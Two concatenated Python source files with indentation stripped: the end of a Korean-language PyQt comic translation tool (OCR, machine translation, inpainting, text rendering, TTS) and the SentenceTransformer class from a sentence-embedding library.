self.memory.img_mark_more, self.memory.img_mark, self.memory.img_textlines = textblockdetector(img)
self.memory.img_mark_more[self.memory.img_mark_more != 0] = 255
height, width, channel = img.shape
self.state.img_half = False
if height > 900 or width > 1500:
self.state.img_half = True
height //= 2
width //= 2
else:
self.state.img_half = False
self.ui.img.setFixedWidth(width)
self.ui.img.setFixedHeight(height)
self.show_img()
self.ui.label_3.setText(f'{self.state.task_end}/{self.state.task_num}')
self.memory.img_repair = None
self.memory.action_save_num = 0
self.memory.action_save_img = []
    # save the image
def save(self):
self.state.action_running = False
if not os.path.exists(self.memory.task_out):
os.mkdir(self.memory.task_out)
name = self.memory.task_out + "/" + self.memory.task_name[self.state.task_end]
# cv2.imwrite(name, self.memory.img_show)
cv2.imencode('.jpg', self.memory.img_show)[1].tofile(name)
self.state.task_end += 1
self.ui.img.update()
messagebox.showinfo(title='성공', message=f'이미지 저장 완료\n{self.memory.task_out}\\{name}')
self.ui.textEdit_3.setText('')
print(f'Info:이미지 저장 완료\n{name}')
if self.state.task_end < self.state.task_num:
self.panel_shownext()
else:
self.panel_clean()
            self.ui.img.flag_switch = False  # lock rectangle drawing
self.ui.pushButton_4.setEnabled(False)
self.ui.pushButton_14.setEnabled(False)
self.ui.pushButton_12.setEnabled(False)
self.ui.pushButton_9.setEnabled(False)
self.ui.pushButton_7.setEnabled(False)
self.ui.pushButton_6.setEnabled(False)
self.ui.pushButton_5.setEnabled(False)
self.ui.pushButton_15.setEnabled(False)
self.ui.pushButton.setEnabled(False)
self.ui.pushButton_3.setEnabled(False)
    # text output direction
def change_word_way(self):
if self.var.word_way == 1:
self.var.word_way = 2
self.ui.pushButton_2.setText('배열:가로')
print('Info:텍스트 가로 출력')
else:
self.var.word_way = 1
self.ui.pushButton_2.setText('배열:수직')
print('Info:텍스트 수직 출력')
self.config_save('word_way', self.var.word_way)
    # text positioning mode
def change_word_mod(self):
if self.var.word_mod == 'auto':
self.var.word_mod = 'Handmade'
print('Info:텍스트 위치 설정 모드: 수동')
self.ui.pushButton_13.setText('위치:수동')
else:
self.var.word_mod = 'auto'
print('Info:텍스트 위치 설정 모드: 자동')
self.ui.pushButton_13.setText('위치:자동')
self.config_save('word_mod', self.var.word_mod)
    # character style (letter spacing) settings
def new_character_style_window(self):
Window = CharacterStyle()
Window.ui.pushButton_1.setStyleSheet(
f'background-color: {self.var.word_conf.color};border-width:0px;border-radius:11px;')
Window.ui.lineEdit_3.setText(str(self.var.word_conf.stroke_width))
Window.ui.pushButton_3.setStyleSheet(
f'background-color: {self.var.word_conf.stroke_fill};border-width:0px;border-radius:11px;')
Window.ui.lineEdit.setText(str(self.var.word_conf.letter_spacing_factor))
Window.ui.lineEdit_2.setText(str(self.var.word_conf.line_spacing_factor))
Window.stroke_fill = self.var.word_conf.stroke_fill
Window.color = self.var.word_conf.color
Window.exec()
if Window.re[0]:
self.var.word_conf.letter_spacing_factor = Window.re[1]
self.var.word_conf.line_spacing_factor = Window.re[2]
self.var.word_conf.color = Window.re[3]
self.var.word_conf.stroke_width = Window.re[4]
self.var.word_conf.stroke_fill = Window.re[5]
print(f'Info:자간{Window.re[1]}\n텍스트 색상{Window.re[3]}\n행간{Window.re[2]}\n그림자 색상{Window.re[5]}\n그림자너비{Window.re[4]}')
self.config_save('line_spacing_factor', self.var.word_conf.line_spacing_factor)
self.config_save('letter_spacing_factor', self.var.word_conf.letter_spacing_factor)
self.config_save('stroke_fill', self.var.word_conf.stroke_fill)
self.config_save('color', self.var.word_conf.color)
self.config_save('stroke_width', self.var.word_conf.stroke_width)
Window.destroy()
    # image inpainting toggle
def change_img_re(self):
if self.var.img_re_bool:
self.var.img_re_bool = False
self.ui.pushButton_8.setText('선택')
print('Info:이미지복원닫기')
print(' 그림복원모드: 배경색칠')
else:
self.var.img_re_bool = True
self.ui.pushButton_8.setText('선택')
print('Info:이미지복구열기')
if self.var.img_re_mod == 1:
print(' 이미지 복구 모드: 표준 텍스트 복구')
elif self.var.img_re_mod == 2:
print(' 그림 복원 모드: 표준 텍스트 복원 확장 1')
elif self.var.img_re_mod == 3:
print(' 그림 복원 모드: 표준 텍스트 복원 확장 2')
elif self.var.img_re_mod == 4:
print(' 그림 복원 모드: 텍스트 복원 강화')
elif self.var.img_re_mod == 5:
print(' 그림 복원 모드: 텍스트 복원 확장 1')
elif self.var.img_re_mod == 6:
print(' 그림 복원 모드: 텍스트 복원 확장 2')
self.config_save('img_re_bool', self.var.img_re_bool)
    # image inpainting mode
def change_img_mod(self):
if self.var.img_re_mod == 6:
self.var.img_re_mod = 1
else:
self.var.img_re_mod += 1
if self.var.img_re_mod == 1:
print('Info:그림 복원 모드: 표준 텍스트 복원')
elif self.var.img_re_mod == 2:
print('Info:그림 복원 모드: 표준 텍스트 복원 확장 1')
elif self.var.img_re_mod == 3:
print('Info:그림 복원 모드: 표준 텍스트 복원 확장 2')
elif self.var.img_re_mod == 4:
print('Info:그림 복원 모드: 텍스트 복원 강화')
elif self.var.img_re_mod == 5:
print('Info:그림 복원 모드: 텍스트 복원 확장 1')
elif self.var.img_re_mod == 6:
print('Info:그림 복원 모드: 텍스트 복원 확장 2')
self.memory.img_repair = None
self.config_save('img_re_mod', self.var.img_re_mod)
def doit(self):
if self.state.action_running:
self.action_save()
if self.state.text_running:
self.do_add_text()
else:
self.do_translation()
def do_translation(self):
pos = self.memory.textline_box[0]
if self.var.img_re_bool:
if self.memory.img_repair is None:
self.img_repair()
roi = self.memory.img_repair[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]]
self.memory.img_show[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]] = roi
else:
white = np.zeros([pos[3], pos[2], 3], dtype=np.uint8) + 255
self.memory.img_show[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]] = white
print('Info:이미지 복원 완료')
        # draw the translated text
text = self.ui.textEdit_2.toPlainText()
if text.replace(" ", "") != '':
img = self.memory.img_show.copy()
pos = self.memory.textline_box[0]
if pos is None: print('Error:boxError')
self.var.word_conf.box = conf.Box(pos[0], pos[1], pos[2], pos[3])
if self.var.word_way == 2 or self.var.word_language == 'en' or self.var.word_language == 'ko':
if self.var.word_way == 1:
print('War:현재 언어는 세로 문자를 지원하지 않습니다.')
self.var.word_conf.dir = 'h'
else:
self.var.word_conf.dir = 'v'
try:
img = render.Render(img)
img = img.draw(text, self.var.word_conf)
self.memory.img_show = img.copy()
except:
print('Error:입력 오류')
else:
print('War:입력되지 않은 텍스트')
self.show_img()
del (self.memory.textline_box[0])
if len(self.memory.textline_box) == 0:
self.state.action_running = False
self.ui.pushButton_5.setEnabled(False)
self.ui.pushButton.setEnabled(False)
self.ui.pushButton_3.setEnabled(False)
self.ui.pushButton_15.setEnabled(False)
self.ui.textEdit.setText('')
self.ui.textEdit_2.setText('')
else:
box = self.memory.textline_box[0]
result = self.memory.model(self.memory.img_show[box[1]:box[3] + box[1], box[0]:box[2] + box[0]])
self.ui.textEdit.setText(result)
if result.replace(" ", "") == '':
print('War:문자인식이 이상합니다. 수동으로 입력해 주세요')
self.ui.textEdit_2.setText('')
else:
with eventlet.Timeout(20, False):
self.ui.textEdit_2.setText(translate(result, f'{self.var.word_language}', "auto"))
if self.ui.textEdit_2.toPlainText() == '':
self.ui.textEdit_2.setText('번역시간초과')
def do_add_text(self):
text = self.ui.textEdit_2.toPlainText()
if text.replace(" ", "") != '':
img = self.memory.img_show.copy()
pos = self.memory.textline_box[0]
if pos is None: print('Error:boxError')
self.var.word_conf.box = conf.Box(pos[0], pos[1], pos[2], pos[3])
if self.var.word_way == 2 or self.var.word_language == 'en' or self.var.word_language == 'ko':
if self.var.word_way == 1:
print('War:현재 언어는 세로 문자를 지원하지 않습니다.')
self.var.word_conf.dir = 'h'
else:
self.var.word_conf.dir = 'v'
try:
img = render.Render(img)
img = img.draw(text, self.var.word_conf)
self.memory.img_show = img.copy()
except:
print('Error:입력 오류')
            # refresh the displayed image
self.show_img()
else:
print('War:입력되지 않은 텍스트')
self.ui.textEdit.setText('')
self.ui.textEdit_2.setText('')
self.state.text_running = self.state.action_running = False
self.ui.pushButton_5.setEnabled(False)
self.ui.pushButton_15.setEnabled(False)
self.ui.pushButton.setEnabled(False)
self.ui.pushButton_3.setEnabled(False)
def closeit(self):
self.state.action_running = False
self.ui.textEdit.setText('')
self.ui.textEdit_2.setText('')
self.state.action_running = False
self.ui.pushButton_5.setEnabled(False)
self.ui.pushButton_15.setEnabled(False)
self.ui.pushButton.setEnabled(False)
self.ui.pushButton_3.setEnabled(False)
    # translate the selected region
def translation_img(self):
if not self.state.mod_ready:
print('Error:모델이 올바르게 로드되지 않음')
return
if not self.state.action_running:
pos = self.get_pos()
if pos is None:
print('Error:boxError')
return
textline_box = []
self.memory.textline_box = []
for i in self.memory.img_textlines:
if compute_iou([i.xyxy[0], i.xyxy[1], i.xyxy[2], i.xyxy[3]],
[pos[0], pos[1], pos[0] + pos[2], pos[1] + pos[3]]) > 0.6:
textline_box.append([i.xyxy[0], i.xyxy[1], i.xyxy[2] - i.xyxy[0] + 3, i.xyxy[3] - i.xyxy[1]])
if len(textline_box) == 0:
self.memory.textline_box.append(pos)
box = pos
print('War:텍스트 위치 이상 감지 \n 강화판 그림 복원 (또는 백색) 을 사용하는 것을 추천합니다.')
elif len(textline_box) == 1:
box = pos
if self.var.word_mod == 'Handmade':
self.memory.textline_box.append(pos)
else:
self.memory.textline_box.append(textline_box[0])
print('Info:검사에 성공했습니다. 번역을 확인하십시오.')
elif len(textline_box) > 1:
for i in textline_box:
self.memory.textline_box.append(i)
box = textline_box[0]
print('Info:현재 영역에 여러 문장이 있습니다 \n 문자 출력 강제 자동 \n 번역을 확인하십시오')
result = self.memory.model(self.memory.img_show[box[1]:box[3] + box[1], box[0]:box[2] + box[0]])
if self.var.img_language == 'ja':
self.ui.textEdit.setText(result)
else:
str = ''
for i in result[1]:
str = str + i[0]
result = str
self.ui.textEdit.setText(result)
if result.replace(" ", "") == '':
print('Info:문자인식이 이상합니다. 수동으로 입력해 주세요')
self.ui.textEdit_2.setText('')
else:
with eventlet.Timeout(20, False):
self.ui.textEdit_2.setText(translate(result, f'{self.var.word_language}', "auto"))
if self.ui.textEdit_2.toPlainText() =='':
self.ui.textEdit_2.setText('번역시간초과')
self.state.action_running = True
self.ui.pushButton_5.setEnabled(True)
self.ui.pushButton_15.setEnabled(True)
self.ui.pushButton.setEnabled(True)
self.ui.pushButton_3.setEnabled(True)
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
def text_add(self):
if not self.state.action_running:
pos = self.get_pos()
if pos is None: return
self.action_save()
self.memory.textline_box = []
self.memory.textline_box.append(pos)
self.ui.textEdit.setText('아래텍스트입력')
# self.ui.textEdit_2.setText('')
self.state.action_running = True
self.ui.pushButton_5.setEnabled(True)
self.ui.pushButton_15.setEnabled(True)
self.state.text_running = True
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
def text_clean(self):
if not self.state.action_running:
pos = self.get_pos()
if pos is None: return
self.action_save()
text = 0
for i in self.memory.img_textlines:
if compute_iou([i.xyxy[0], i.xyxy[1], i.xyxy[2], i.xyxy[3]],
[pos[0], pos[1], pos[0] + pos[2], pos[1] + pos[3]]) > 0.6:
text += 1
if text == 0:
print('War:현재 영역 텍스트 감지 이상 \n은 강화판 그림 복원 (또는 백색) 을 사용하는 것을 추천합니다.')
            # image inpainting
if self.var.img_re_bool:
if self.memory.img_repair is None:
self.img_repair()
roi = self.memory.img_repair[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]]
self.memory.img_show[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]] = roi
else:
white = np.zeros([pos[3], pos[2], 3], dtype=np.uint8) + 255
self.memory.img_show[pos[1]:pos[1] + pos[3], pos[0]:pos[0] + pos[2]] = white
print('Info:이미지 복원 완료')
            # refresh the displayed image
self.show_img()
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
def auto_text_clean(self):
if not self.state.action_running:
self.action_save()
            # image inpainting
if self.memory.img_repair is None:
self.img_repair()
self.memory.img_show = self.memory.img_repair.copy()
print('Info:이미지 복원 완료\n일부 영역은 스스로 백색해야 한다.')
            # refresh the displayed image
self.show_img()
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
    # extract the selected box
def get_pos(self):
pos = self.memory.range_choice = self.ui.img.img_pos
if pos == [0, 0, 0, 0] or pos[2] < 2 or pos[3] < 2:
print('Error:입력 영역이 선택되지 않았습니다')
return None
if self.state.img_half:
pos = self.memory.range_choice = [pos[0] * 2, pos[1] * 2, pos[2] * 2, pos[3] * 2]
return pos
    # display the current image
def show_img(self):
if self.state.img_half:
height, width, channel = self.memory.img_show.shape
height //= 2
width //= 2
img = cv2.resize(self.memory.img_show, (width, height))
else:
img = self.memory.img_show
cv2.imwrite('save.jpg',self.memory.img_show)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
showImage = QtGui.QImage(img.data, img.shape[1], img.shape[0], img.shape[1] * img.shape[2],
QtGui.QImage.Format.Format_RGB888)
self.ui.img.setPixmap(QtGui.QPixmap.fromImage(showImage))
    # undo
def cancel(self):
if not self.state.action_running:
self.memory.img_show = self.memory.action_save_img[self.memory.action_save_num - 1].copy()
self.memory.action_save_num -= 1
self.show_img()
print('Info:취소완료')
if self.memory.action_save_num == 0:
self.ui.pushButton_7.setEnabled(False)
else:
print('War:작업 대열이 완료되지 않아 오른쪽 하단에서 계속됩니다.')
    # save an undo snapshot
def action_save(self):
if len(self.memory.action_save_img) == self.memory.action_save_num:
self.memory.action_save_img.append(self.memory.img_show.copy())
else:
self.memory.action_save_img[self.memory.action_save_num] = self.memory.img_show.copy()
self.memory.action_save_num += 1
if self.memory.action_save_num > 0:
self.ui.pushButton_7.setEnabled(True)
    # image inpainting: feed the image to the network model
def img_repair(self):
print('Info:검사중, 잠시후에 시도해줘')
if self.var.img_re_mod < 4:
mark = self.memory.img_mark
else:
mark = self.memory.img_mark_more
if self.var.img_re_mod % 3 != 1:
kernel = np.ones((5, 5), dtype=np.uint8)
mark = cv2.dilate(mark, kernel, self.var.img_re_mod % 3 - 1)
mark[mark != 0] = 255
img1 = self.memory.img_show.copy()
img1[mark > 0] = 255
self.memory.img_repair = Inpainting(img1, mark)
    # read the text aloud (TTS)
def tts(self):
from gtts.tts import gTTS
import pyglet
if self.ui.textEdit.toPlainText().isspace() != True:
try:
tts = gTTS(text=self.ui.textEdit.toPlainText(), lang=self.var.img_language)
filename = 'temp.mp3'
tts.save(filename)
music = pyglet.media.load(filename, streaming=False)
music.play()
time.sleep(music.duration)
os.remove(filename)
except:
print('War:네트워크 이상,TTS错误')
    # switch the translation mode
def change_translate_mod(self):
change_translate_mod()
if self.ui.textEdit.toPlainText().isspace() != True:
self.ui.textEdit_2.setText(translate(self.ui.textEdit.toPlainText(), f'{self.var.word_language}', "auto"))
    # save a parameter
def config_save(self, parameter, value):
config = configparser.ConfigParser()
config.read('config.ini')
config.set('var', f'{parameter}', f'{value}')
with open('./config.ini', 'w+') as config_file:
config.write(config_file)
    # load parameters
def config_read(self):
config = configparser.ConfigParser()
config.read('config.ini')
self.var.img_language = config.get('var', 'img_language')
self.change_mod(self.var.img_language)
self.var.word_language = config.get('var', 'word_language')
self.change_out_language(self.var.word_language)
self.var.word_mod = config.get('var', 'word_mod')
if self.var.word_mod == 'auto':
self.ui.pushButton_13.setText('위치:자동')
else:
self.ui.pushButton_13.setText('위치:수동')
self.var.word_way = config.getint('var', 'word_way')
if self.var.word_way == 1:
self.ui.pushButton_2.setText('배열:수직')
else:
self.ui.pushButton_2.setText('배열:가로')
self.var.img_re_bool = config.getboolean('var', 'img_re_bool')
if self.var.img_re_bool:
self.ui.pushButton_8.setText('선택')
else:
self.ui.pushButton_8.setText('선택')
self.var.img_re_mod = config.getint('var', 'img_re_mod')
self.var.word_conf.font = config.get('var', 'font')
self.ui.label_6.setText(self.var.word_conf.font)
self.var.word_conf.color = config.get('var', 'color')
self.var.word_conf.stroke_width = config.getint('var', 'stroke_width')
self.var.word_conf.stroke_fill = config.get('var', 'stroke_fill')
self.var.word_conf.line_spacing_factor = config.getfloat('var', 'line_spacing_factor')
self.var.word_conf.letter_spacing_factor = config.getfloat('var', 'letter_spacing_factor')
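    # Illustrative config.ini layout implied by config_read()/config_save()
    # above (inferred from the keys accessed here; the actual shipped defaults
    # may differ):
    #
    #   [var]
    #   img_language = ja
    #   word_language = zh-CN
    #   word_mod = auto
    #   word_way = 1
    #   img_re_bool = True
    #   img_re_mod = 1
    #   font = example.ttf
    #   color = #000000
    #   stroke_width = 0
    #   stroke_fill = #ffffff
    #   line_spacing_factor = 1.0
    #   letter_spacing_factor = 1.0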
# character style settings dialog
class CharacterStyle(QtWidgets.QDialog):
def __init__(self):
super().__init__()
self.color = ''
self.stroke_fill = ''
self.ui = CharacterStyleDialog()
self.setWindowIcon(QtGui.QIcon('img.png'))
self.setWindowFlags(QtCore.Qt.WindowType.WindowCloseButtonHint)
self.ui.setupUi(self)
self.ui.lineEdit.setValidator(QtGui.QDoubleValidator())
self.ui.lineEdit_2.setValidator(QtGui.QDoubleValidator())
self.ui.lineEdit_3.setValidator(QtGui.QIntValidator())
self.ui.pushButton.clicked.connect(self.ok)
self.ui.pushButton_1.clicked.connect(self.change_word_colour)
self.ui.pushButton_2.clicked.connect(self.close)
self.ui.pushButton_3.clicked.connect(self.change_shadow_colour)
self.re = [False, 0, 0, '', 0, '']
def ok(self):
self.re = [True, float(self.ui.lineEdit.text()), float(self.ui.lineEdit_2.text()), self.color,
int(self.ui.lineEdit_3.text()), self.stroke_fill]
self.accept()
def close(self):
self.re = [False, 0, 0, '', 0, '']
self.reject()
def change_word_colour(self):
r = colorchooser.askcolor(title='텍스트색상')
self.color = r[1]
self.ui.pushButton_1.setStyleSheet(f'background-color: {r[1]};border-width:0px;border-radius:11px;')
def change_shadow_colour(self):
r = colorchooser.askcolor(title='그림자색상')
self.stroke_fill = r[1]
self.ui.pushButton_3.setStyleSheet(f'background-color: {r[1]};border-width:0px;border-radius:11px;')
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
app.exec()
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable
from zipfile import ZipFile
import requests
import numpy as np
import transformers
import torch
from numpy import ndarray
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
from tqdm.autonotebook import tqdm, trange
import torch.multiprocessing as mp
import math
import queue
from . import __DOWNLOAD_SERVER__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, http_get
from .datasets.EncodeDataset import EncodeDataset
from .models import Transformer, Pooling
from . import __version__
class SentenceTransformer(nn.Sequential):
def __init__(self, model_name_or_path: str = None, modules: Iterable[nn.Module] = None, device: str = None):
if model_name_or_path is not None and model_name_or_path != "":
logging.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
model_path = model_name_or_path
if not os.path.isdir(model_path) and not model_path.startswith('http://') and not model_path.startswith('https://'):
logging.info("Did not find folder {}. Assume to download model from server.".format(model_path))
model_path = __DOWNLOAD_SERVER__ + model_path + '.zip'
if model_path.startswith('http://') or model_path.startswith('https://'):
model_url = model_path
folder_name = model_url.replace("https://", "").replace("http://", "").replace("/", "_")[:250].rstrip('.zip')
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(
os.getenv('TORCH_HOME', os.path.join(
os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
default_cache_path = os.path.join(torch_cache_home, 'sentence_transformers')
model_path = os.path.join(default_cache_path, folder_name)
os.makedirs(model_path, exist_ok=True)
if not os.listdir(model_path):
if model_url[-1] == "/":
model_url = model_url[:-1]
logging.info("Downloading sentence transformer model from {} and saving it at {}".format(model_url, model_path))
try:
zip_save_path = os.path.join(model_path, 'model.zip')
http_get(model_url, zip_save_path)
with ZipFile(zip_save_path, 'r') as zip:
zip.extractall(model_path)
os.remove(zip_save_path)
except requests.exceptions.HTTPError as e:
shutil.rmtree(model_path)
if e.response.status_code == 404:
logging.warning('SentenceTransformer-Model {} not found. Try to create it from scratch'.format(model_url))
logging.warning('Try to create Transformer Model {} with mean pooling'.format(model_name_or_path))
model_path = None
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension())
modules = [transformer_model, pooling_model]
else:
raise e
except Exception as e:
shutil.rmtree(model_path)
raise e
#### Load from disk
if model_path is not None:
logging.info("Load SentenceTransformer from folder: {}".format(model_path))
if os.path.exists(os.path.join(model_path, 'config.json')):
with open(os.path.join(model_path, 'config.json')) as fIn:
config = json.load(fIn)
if config['__version__'] > __version__:
logging.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(config['__version__'], __version__))
with open(os.path.join(model_path, 'modules.json')) as fIn:
contained_modules = json.load(fIn)
modules = OrderedDict()
for module_config in contained_modules:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logging.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str], List[int]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
is_pretokenized: bool = False,
device: str = None,
num_workers: int = 0) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
        :param show_progress_bar: Output a progress bar when encoding sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
        :param convert_to_tensor: If true, one large tensor is returned. Overrides any setting of convert_to_numpy
        :param is_pretokenized: If is_pretokenized=True, sentences must be a list of integers, containing the tokenized sentences with each token converted to its respective int.
        :param device: Which torch.device to use for the computation
        :param num_workers: Number of background workers to tokenize data. Set to a positive number to increase tokenization speed
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logging.getLogger().getEffectiveLevel()==logging.INFO or logging.getLogger().getEffectiveLevel()==logging.DEBUG)
input_was_string = False
if isinstance(sentences, str): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([len(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
inp_dataset = EncodeDataset(sentences_sorted, model=self, is_tokenized=is_pretokenized)
inp_dataloader = DataLoader(inp_dataset, batch_size=batch_size, collate_fn=self.smart_batching_collate_text_only, num_workers=num_workers, shuffle=False)
iterator = inp_dataloader
if show_progress_bar:
iterator = tqdm(inp_dataloader, desc="Batches")
for features in iterator:
for feature_name in features:
features[feature_name] = features[feature_name].to(device)
with torch.no_grad():
out_features = self.forward(features)
embeddings = out_features[output_value]
if output_value == 'token_embeddings':
#Set token embeddings to 0 for padding tokens
input_mask = out_features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(embeddings.size()).float()
embeddings = embeddings * input_mask_expanded
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.cpu().detach().numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
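    # Usage sketch (illustrative; the model name below is just an example of a
    # published SentenceTransformer model and is not required by this code):
    #
    #   model = SentenceTransformer('distilbert-base-nli-stsb-mean-tokens')
    #   embeddings = model.encode(['First sentence.', 'Second sentence.'],
    #                             batch_size=32, convert_to_numpy=True)
    #   # embeddings is a numpy matrix with one row per input sentence.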
def start_multi_process_pool(self, target_devices: List[str] = None, encode_batch_size: int = 32):
"""
        Starts a multi-process pool to run encode() with several independent processes.
        This method is recommended if you want to encode on multiple GPUs. It is advised
        to start only one process per GPU. This method works together with encode_multi_process.
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:param encode_batch_size: Batch size for each process when calling encode
        :return: Returns a dict with the target processes, an input queue and an output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logging.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logging.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue, encode_batch_size), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], is_pretokenized: bool = False):
"""
        This method allows running encode() on multiple GPUs. The sentences are chunked into smaller packages
        and sent to individual processes, which encode them on the different GPUs. This method is only suitable
        for encoding large sets of sentences.
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
        :param is_pretokenized: If true, no tokenization will be applied. It is expected that the input sentences are lists of ints.
:return: Numpy matrix with all embeddings
"""
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logging.info("Chunk data into packages of size {}".format(chunk_size))
if is_pretokenized:
sentences_tokenized = sentences
else:
sentences_tokenized = map(self.tokenize, sentences)
input_queue = pool['input']
num_chunks = 0
chunk = []
for sentence in sentences_tokenized:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([num_chunks, chunk])
num_chunks += 1
chunk = []
if len(chunk) > 0:
input_queue.put([num_chunks, chunk])
num_chunks += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(num_chunks)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
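    # Multi-GPU usage sketch (illustrative, following the docstrings above):
    #
    #   pool = model.start_multi_process_pool()             # one worker per CUDA device
    #   emb = model.encode_multi_process(sentences, pool)   # numpy matrix of embeddings
    #   SentenceTransformer.stop_multi_process_pool(pool)   # terminate the workers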
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue, encode_batch_size):
"""
        Internal worker process that encodes sentences in the multi-process setup
"""
while True:
try:
id, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, is_pretokenized=True, show_progress_bar=False, convert_to_numpy=True, batch_size=encode_batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
        Returns the maximal sequence length of inputs the model accepts. Longer inputs will be truncated.
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, text: str):
"""
Tokenizes the text
"""
return self._first_module().tokenize(text)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
return self._last_module().get_sentence_embedding_dimension()
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
"""
if path is None:
return
logging.info("Save model to {}".format(path))
contained_modules = []
for idx, name in enumerate(self._modules):
module = self._modules[name]
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
contained_modules.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(contained_modules, fOut, indent=2)
with open(os.path.join(path, 'config.json'), 'w') as fOut:
json.dump({'__version__': __version__}, fOut, indent=2)
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0][0])
labels = []
paired_texts = [[] for _ in range(num_texts)]
max_seq_len = [0] * num_texts
for tokens, label in batch:
labels.append(label)
for i in range(num_texts):
paired_texts[i].append(tokens[i])
max_seq_len[i] = max(max_seq_len[i], len(tokens[i]))
features = []
for idx in range(num_texts):
max_len = max_seq_len[idx]
feature_lists = {}
for text in paired_texts[idx]:
sentence_features = self.get_sentence_features(text, max_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
#feature_lists[feature_name] = torch.tensor(np.asarray(feature_lists[feature_name]))
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
features.append(feature_lists)
return {'features': features, 'labels': torch.stack(labels)}
def smart_batching_collate_text_only(self, batch):
"""
